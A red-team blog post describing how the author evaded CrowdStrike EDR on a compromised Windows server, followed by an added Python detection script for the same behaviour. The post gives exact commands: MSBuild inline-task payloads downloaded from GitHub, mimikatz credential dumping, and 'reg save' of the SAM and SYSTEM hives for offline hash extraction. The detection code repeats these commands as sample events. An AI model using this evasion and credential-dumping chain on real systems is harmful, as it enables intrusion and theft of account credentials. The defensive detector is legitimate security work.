How I Bypassed Crowdstrike Restriction

Vivek Chauhan
Jul 12, 2020


CrowdStrike is a suite of advanced EDR (endpoint detection and response) applications and techniques that provides an industry-leading NGAV (next-generation anti-virus) offering, using machine learning to stop breaches before they occur. CrowdStrike monitors processes running on the OS by hooking, so if any malicious process is run on a machine it will be monitored and logged; all of this happens at the kernel level.

In this post, I am going to explain how I managed to bypass CrowdStrike EDR and dump hashes by executing mimikatz on a CrowdStrike-protected network.

In a recent red teaming assessment, I got a foothold on a web application with limited user access (the IIS user) running on Windows Server 2012 R2, so my first task was privilege escalation to get local admin privileges.

For this, I ran the Juicy Potato exploit (a FUD version by Anurag Srivastava, thanks!) and created a user with admin privileges.

Later, I tried to dump LSASS with procdump so I could get other users' hashes, but CrowdStrike blocked procdump, categorizing it as malicious behavior… hmmm…

I tried all the known techniques to dump LSASS but failed. Sigh!

My googling skills came to the rescue: I luckily found some interesting writeups and scripts, but the best and most trusted script I found is by Casey Smith (Twitter: @subTee):

https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj

To run this script, save it in any directory with write permission, execute it and behold the magic:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj

I was able to run PowerShell without restriction, with CrowdStrike sleeping. My next task was to dump hashes and perform post-exploitation.

I knew this technique would work in this scenario, so I downloaded one more script, also written by Casey Smith:

https://raw.githubusercontent.com/3gstudent/msbuild-inline-task/master/executes%20mimikatz.xml

As before, save the script in any writable directory and run the command below.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe mimiketz.xml

Voila! I got a mimikatz shell :P with CrowdStrike & Symantec still sleeping. Time to dump passwords.

mimikatz # privilege::debug

mimikatz # sekurlsa::logonpasswords

I then started to dump hashes, but no luck: I got an error because CrowdStrike was hooking the LSASS process and not allowing me to dump it, so I started testing another way to dump: offline.

For this, I needed to extract and copy the SYSTEM and SAM registry hives for the local machine.

reg save HKLM\SYSTEM SystemBkup.hiv

reg save HKLM\SAM SamBkup.hiv

mimikatz # privilege::debug

mimikatz # token::whoami

If you’re not SYSTEM or using an impersonated SYSTEM token, you'll get an access denied error:

mimikatz # token::elevate

I then ran “log hash.txt” so that the output of the next command is written to a text file.

mimikatz # log hash.txt

Then I ran “lsadump::sam SystemBkup.hiv SamBkup.hiv” to display the usernames and hashes for all local users.

mimikatz # lsadump::sam SystemBkup.hiv SamBkup.hiv

And see the magic ;) All output is saved to hash.txt.
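As an added, defender-side example (not part of the original post, and not CrowdStrike's or mimikatz's code), here is a small Python detection pass over constructed process-creation events covering the two behaviours the post chains together: msbuild.exe launching an inline-task project file (.csproj or .xml) from a user-writable directory, and reg.exe saving the SAM and SYSTEM hives that the offline lsadump::sam step needs. The key=value event format, the sample lines, the writable-path list and the rule names are all assumptions made for this example.

```python
"""Detection examples for the behaviours described in this post (added by the
editor, not part of the original post).

  1. msbuild.exe used as a living-off-the-land launcher for an inline-task
     project file (.csproj / .xml) sitting in a user-writable directory.
  2. reg.exe saving the SAM / SYSTEM / SECURITY hive, the precondition for
     the offline lsadump::sam step.

Field names (EventID, User, Image, ParentImage, CommandLine) mimic Sysmon
event 1, but the line format and every sample line below are constructed.
"""
import re
from typing import Dict, List, Optional, Set

KEYS = ("EventID", "User", "Image", "ParentImage", "CommandLine")
# Split only in front of a known key so values (paths, command lines) may contain spaces.
_SPLIT = re.compile(r" (?=(?:%s)=)" % "|".join(KEYS))
# Command-line tokens: a double-quoted run or a run of non-whitespace.
_TOKEN = re.compile(r'"[^"]*"|\S+')

# Constructed sample telemetry: one benign CI build, then the chain from the post.
SAMPLE_EVENTS = [
    "EventID=1 User=CORP\\svc-build Image=C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe "
    "ParentImage=C:\\Program Files\\Jenkins\\jenkins.exe CommandLine=msbuild.exe C:\\builds\\app\\app.csproj /t:Build",
    "EventID=1 User=IIS APPPOOL\\DefaultAppPool Image=C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe "
    "ParentImage=C:\\Windows\\System32\\cmd.exe CommandLine=msbuild.exe C:\\inetpub\\wwwroot\\uploads\\MSBuildShell.csproj",
    "EventID=1 User=SRV01\\backdoor Image=C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe "
    "ParentImage=C:\\Windows\\System32\\cmd.exe CommandLine=msbuild.exe C:\\Users\\Public\\mimiketz.xml",
    "EventID=1 User=SRV01\\backdoor Image=C:\\Windows\\System32\\reg.exe "
    "ParentImage=C:\\Windows\\System32\\cmd.exe CommandLine=reg save HKLM\\SYSTEM SystemBkup.hiv",
    "EventID=1 User=SRV01\\backdoor Image=C:\\Windows\\System32\\reg.exe "
    "ParentImage=C:\\Windows\\System32\\cmd.exe CommandLine=reg save HKLM\\SAM SamBkup.hiv",
    "EventID=1 User=CORP\\admin Image=C:\\Windows\\System32\\reg.exe "
    "ParentImage=C:\\Windows\\System32\\cmd.exe CommandLine=reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
]

# Locations a low-privileged account can usually write to (assumed list); a project
# file launched from here rather than from a source tree or CI workspace is suspicious.
WRITABLE_PREFIXES = ("c:\\users\\", "c:\\inetpub\\", "c:\\programdata\\", "c:\\windows\\temp\\")
PROJECT_EXT = (".csproj", ".vbproj", ".proj", ".xml")
SENSITIVE_HIVES = ("hklm\\sam", "hklm\\system", "hklm\\security")


def parse_event(line: str) -> Dict[str, str]:
    """Parse one 'Key=Value Key=Value ...' line into a dict."""
    fields: Dict[str, str] = {}
    for chunk in _SPLIT.split(line.strip()):
        key, _, value = chunk.partition("=")
        fields[key] = value
    return fields


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _finding(rule: str, ev: Dict[str, str]) -> Dict[str, str]:
    return {"rule": rule, "user": ev.get("User", ""),
            "parent": _basename(ev.get("ParentImage", "")), "command": ev.get("CommandLine", "")}


def msbuild_inline_task(ev: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Flag msbuild.exe given a project file from a writable path, or any .xml
    project (MSBuild accepts the extension; build pipelines rarely use it)."""
    if _basename(ev.get("Image", "")) != "msbuild.exe":
        return None
    for token in _TOKEN.findall(ev.get("CommandLine", "")):
        path = token.strip('"').lower()
        if not path.endswith(PROJECT_EXT):
            continue
        if path.startswith(WRITABLE_PREFIXES) or path.endswith(".xml"):
            return _finding("msbuild_inline_task", ev)
    return None


def hive_export(ev: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Flag 'reg save|export' of a whole credential hive (the offline dump needs
    the full SYSTEM hive for the boot key plus SAM or SECURITY)."""
    if _basename(ev.get("Image", "")) != "reg.exe":
        return None
    tokens = [t.strip('"').lower() for t in _TOKEN.findall(ev.get("CommandLine", ""))]
    for i, tok in enumerate(tokens[:-1]):
        if tok in ("save", "export"):
            hive = tokens[i + 1].replace("hkey_local_machine", "hklm")
            if hive in SENSITIVE_HIVES:
                return _finding("hive_export", ev)
    return None


RULES = (msbuild_inline_task, hive_export)


def detect(lines: List[str]) -> List[Dict[str, str]]:
    """Run every rule over every event and collect the hits in order."""
    findings: List[Dict[str, str]] = []
    for line in lines:
        ev = parse_event(line)
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


def chained_users(findings: List[Dict[str, str]]) -> Set[str]:
    """Accounts that both launched MSBuild suspiciously and exported a credential
    hive: the sequence in this post, which deserves an analyst's attention."""
    by_user: Dict[str, Set[str]] = {}
    for f in findings:
        by_user.setdefault(f["user"], set()).add(f["rule"])
    return {u for u, rules in by_user.items() if rules >= {"msbuild_inline_task", "hive_export"}}


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for h in hits:
        print(f"[{h['rule']}] {h['user']} (parent {h['parent']}): {h['command']}")
    print("chained:", chained_users(hits))
```

On the constructed sample the benign Jenkins build and the `reg query` are ignored, the two MSBuild launches and the two hive saves are flagged, and the `SRV01\backdoor` account is reported as having performed both halves of the chain. Backup jobs legitimately export hives and developers legitimately run MSBuild, so in production the value is in the correlation (same account, short time window, parent of cmd.exe or an IIS app pool identity) rather than in either rule alone.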

Special mentions: Manish Tanwar, Anurag Srivastava and Casey Smith

Happy Hacking ;)

Vivek Chauhan
